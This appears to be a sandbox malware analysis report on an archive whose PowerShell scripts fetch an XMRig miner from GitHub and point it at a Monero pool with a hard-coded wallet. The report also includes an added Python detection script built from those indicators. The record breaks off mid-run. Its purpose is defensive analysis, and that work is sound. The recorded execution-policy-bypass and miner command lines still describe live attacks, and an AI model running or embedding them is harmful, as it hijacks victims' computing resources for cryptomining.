Malware Analysis Report

2024-11-16 12:06

Sample ID 240528-b9dx7abe72
Target main3.rar
SHA256 4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Tags: execution, xmrig, miner
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral20, behavioral26, behavioral30, behavioral12, behavioral13, behavioral14, behavioral22, behavioral32, behavioral2, behavioral16, behavioral25, behavioral28, behavioral29, behavioral3, behavioral6, behavioral8, behavioral9, behavioral27, behavioral7, behavioral17, behavioral21, behavioral24, behavioral4, behavioral19, behavioral31, behavioral10, behavioral18, behavioral23, behavioral1, behavioral5, behavioral11, behavioral15 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10

SHA256 4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88

Threat Level: Known bad

The file main3.rar was found to be: Known bad.

What the runs show: every behavioral run in this report starts one of the archive's PowerShell scripts (the file01 - copia (N).ps1 variants) with powershell.exe -ExecutionPolicy bypass -File from C:\Users\Admin\AppData\Local\Temp. On the win10 runs (behavioral13, behavioral26, behavioral30) the script connects to github.com and objects.githubusercontent.com over TCP 443, writes xmrig-6.21.3\xmrig.exe (SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda) under that Temp directory, and launches it against the pool gulf.moneroocean.stream:10128 (149.102.143.109) with a hard-coded 95-character Monero wallet; the miner then enables SeLockMemoryPrivilege, which XMRig requests for large-page memory. On the win11 runs (behavioral12, behavioral20) powershell.exe only issued a DNS query for github.com, made no TCP connection and dropped nothing, so the script got no further than name resolution there; the lower signature count on those runs should not be read as a benign script. The __PSScriptPolicyTest_*.ps1 files listed under Files are written by PowerShell itself at startup to probe script-execution policy (on the win10 runs their hashes are those of the one-byte string "1"); they are not dropped by the sample and are not indicators.

Malicious Activity Summary

Tags: execution, xmrig, miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver
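
The following Python is an added example, not part of this sandbox report and not code from the sample or from XMRig. It turns the signatures and indicators above into detection logic run over a few constructed process-creation and network-connection records: PowerShell launched with the execution policy bypassed for a script under Temp, an executable under Temp spawned by PowerShell, an xmrig-style command line (parsed for pool host, port and wallet, with a general Monero address check rather than only the one wallet seen here), the known xmrig.exe hash, SeLockMemoryPrivilege enabled by a Temp executable, and a connection to the pool. The Sysmon-like record shape, the field names, the parent/child link (the report lists both processes but does not state a PID relationship), the privilege fields and the benign control record are assumptions made for the example; the indicators themselves are taken from the report.

```python
"""Detection logic for the PowerShell -> XMRig chain recorded in this report.

Added example: not part of the sandbox report and not the sample's own code.
Indicators (pool host and port, wallet, dropped-file path, SHA256,
SeLockMemoryPrivilege) come from the report; the Sysmon-like record shape,
the field names and the sample records below are assumptions for the example.
"""
import re
from dataclasses import dataclass

# Indicators from the Processes, Network and Files sections of the report.
POOL_HOSTS = {"gulf.moneroocean.stream"}
POOL_PORTS = {10128}
MINER_SHA256 = "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"
WALLET = "45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"

# Monero standard addresses: 95 base58 characters, first character '4'
# ('8' for subaddresses). The wallet in the report is one.
MONERO_ADDR = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")
# xmrig switches: -o <host>:<port> and -u <wallet[.worker]>; their order may vary.
XMRIG_POOL = re.compile(r"(?:^|\s)-o\s+(\S+?):(\d{2,5})\b")
XMRIG_USER = re.compile(r"(?:^|\s)-u\s+(\S+)")
# PowerShell started with the execution policy bypassed for a script under %TEMP%.
PS_BYPASS = re.compile(
    r'-ExecutionPolicy\s+bypass\b.*-File\s+"?[^"]*\\AppData\\Local\\Temp\\[^"]+\.ps1', re.I)
TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\.*\.exe$", re.I)


@dataclass
class ProcEvent:            # process creation (Sysmon EID 1-like, assumed shape)
    pid: int
    ppid: int
    image: str
    cmdline: str
    sha256: str = ""
    privileges: tuple = ()  # privileges the process enabled on its token


@dataclass
class NetEvent:             # outbound connection (Sysmon EID 3-like, assumed shape)
    pid: int
    dst_host: str
    dst_port: int


def extract_pool(cmdline):
    """Return (host, port, wallet) from an xmrig-style command line, or None."""
    pool, user = XMRIG_POOL.search(cmdline), XMRIG_USER.search(cmdline)
    if not pool or not user:
        return None
    host = pool.group(1).split("://")[-1]               # drop stratum+tcp:// if present
    wallet = user.group(1).split(".")[0].split("+")[0]  # drop .worker / +difficulty suffix
    return host, int(pool.group(2)), wallet


def analyse(procs, nets):
    """Return {pid: sorted alert names} for the given process and network events."""
    by_pid = {p.pid: p for p in procs}
    alerts = {}

    def hit(pid, name):
        alerts.setdefault(pid, set()).add(name)

    for p in procs:
        is_powershell = p.image.lower().endswith("powershell.exe")
        if is_powershell and PS_BYPASS.search(p.cmdline):
            hit(p.pid, "powershell_bypass_temp_script")
        if TEMP_EXE.search(p.image):
            parent = by_pid.get(p.ppid)
            if parent and parent.image.lower().endswith("powershell.exe"):
                hit(p.pid, "temp_exe_spawned_by_powershell")
            if "SeLockMemoryPrivilege" in p.privileges:   # XMRig requests it for large pages
                hit(p.pid, "lock_memory_privilege_from_temp")
        pool = extract_pool(p.cmdline)
        if pool and (MONERO_ADDR.fullmatch(pool[2])
                     or pool[0] in POOL_HOSTS or pool[1] in POOL_PORTS):
            hit(p.pid, "xmrig_cmdline")
        if p.sha256.lower() == MINER_SHA256:
            hit(p.pid, "known_xmrig_hash")
    for n in nets:
        if n.dst_host in POOL_HOSTS or n.dst_port in POOL_PORTS:
            hit(n.pid, "mining_pool_connection")
    return {pid: sorted(names) for pid, names in alerts.items()}


# Constructed sample records modelled on run behavioral26. The command lines and the
# PID numbers 4252 and 3968 appear in that run; which PID is which process, the
# parent link, the privilege fields and the benign control (PID 5100) are assumptions.
SAMPLE_PROCS = [
    ProcEvent(4252, 1234, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"',
              privileges=("SeDebugPrivilege",)),
    ProcEvent(3968, 4252, r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u ' + WALLET,
              sha256=MINER_SHA256, privileges=("SeLockMemoryPrivilege",)),
    ProcEvent(5100, 1234, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -File "C:\ProgramData\Scripts\backup.ps1"'),
]
SAMPLE_NETS = [
    NetEvent(3968, "gulf.moneroocean.stream", 10128),
    NetEvent(4252, "objects.githubusercontent.com", 443),
]

if __name__ == "__main__":
    for pid, names in analyse(SAMPLE_PROCS, SAMPLE_NETS).items():
        print(pid, ", ".join(names))
```

The command-line checks are deliberately independent of the pool domain and wallet: a rebuilt sample with a different pool still carries a 95-character base58 address after -u, so the address check and the Temp-executable-from-PowerShell check are the parts worth keeping once the exact indicators have rotated. The benign control (a script run without -ExecutionPolicy bypass from outside Temp) raises nothing.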

MITRE ATT&CK (Enterprise Matrix V15)

Techniques evidenced by the signatures in this report: Execution, Command and Scripting Interpreter: PowerShell (T1059.001); Impact, Resource Hijacking (T1496) for the XMRig miner.

Analysis: static1

Detonation Overview

Reported

2024-05-28 01:50

Signatures

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:11

Platform

win11-20240508-en

Max time kernel

1759s

Max time network

1771s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/4852-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoi34s1j.igp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4852-9-0x0000020BE5780000-0x0000020BE57A2000-memory.dmp

memory/4852-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/4852-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/4852-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/4852-13-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/4852-14-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:15

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rule hits; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 8.24.18.2.in-addr.arpa udp
NL 52.142.223.178:80 (no domain recorded) tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4252-3-0x00007FF83E4B3000-0x00007FF83E4B4000-memory.dmp

memory/4252-5-0x0000010CE9E40000-0x0000010CE9E62000-memory.dmp

memory/4252-6-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/4252-9-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/4252-10-0x0000010CE9FF0000-0x0000010CEA066000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dllvs5e.sl2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4252-25-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/4252-48-0x0000010CEA190000-0x0000010CEA1A2000-memory.dmp

memory/4252-61-0x0000010CE9FE0000-0x0000010CE9FEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3968-90-0x000001C4BF560000-0x000001C4BF580000-memory.dmp

memory/3968-91-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/3968-92-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

memory/4252-93-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/4252-94-0x00007FF83E4B3000-0x00007FF83E4B4000-memory.dmp

memory/4252-95-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp

memory/3968-96 through memory/3968-156: 61 consecutive dumps, each 0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:17

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rule hits; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 9.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp

Files

memory/2916-2-0x00007FF931353000-0x00007FF931354000-memory.dmp

memory/2916-5-0x00000146412F0000-0x0000014641312000-memory.dmp

memory/2916-6-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-7-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-10-0x00000146414A0000-0x0000014641516000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtddsseb.dc4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2916-25-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2916-48-0x0000014641520000-0x0000014641532000-memory.dmp

memory/2916-61-0x0000014641490000-0x000001464149A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2848-90-0x0000022E6EAE0000-0x0000022E6EB00000-memory.dmp

memory/2848-91-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2916-92-0x00007FF931353000-0x00007FF931354000-memory.dmp

memory/2916-93-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2848-94-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

memory/2916-95-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/2848-96 through memory/2848-156: 61 consecutive dumps, each 0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:05

Platform

win11-20240508-en

Max time kernel

1709s

Max time network

1719s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/5064-0-0x00007FFA49493000-0x00007FFA49495000-memory.dmp

memory/5064-9-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_id1u1z21.k41.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5064-10-0x0000022346EF0000-0x0000022346F12000-memory.dmp

memory/5064-11-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp

memory/5064-12-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp

memory/5064-13-0x00007FFA49493000-0x00007FFA49495000-memory.dmp

memory/5064-14-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:07

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rule hits; the sandbox recorded no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/3376-0-0x00007FF840123000-0x00007FF840124000-memory.dmp

memory/3376-5-0x0000025411240000-0x0000025411262000-memory.dmp

memory/3376-6-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/3376-9-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/3376-10-0x00000254299F0000-0x0000025429A66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpiy4bqc.les.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3376-25-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/3376-48-0x0000025429B90000-0x0000025429BA2000-memory.dmp

memory/3376-61-0x0000025429760000-0x000002542976A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4380-90-0x000001A5500E0000-0x000001A550100000-memory.dmp

memory/4380-91-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/3376-93-0x00007FF840123000-0x00007FF840124000-memory.dmp

memory/3376-94-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/4380-92-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/3376-95-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/3376-96-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/4380-97 through memory/4380-134: 38 consecutive dumps, each 0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-135-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-136-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-137-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-138-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-139-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-140-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-141-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-142-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-143-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-144-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-145-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-146-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-147-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-148-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-149-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-150-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-151-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-152-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-153-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-154-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-155-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-156-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-157-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:08

Platform

win10-20240404-en

Max time kernel

1790s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the sandbox exported every column as N/A, so no description, indicator, process or target is recorded for this rule)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
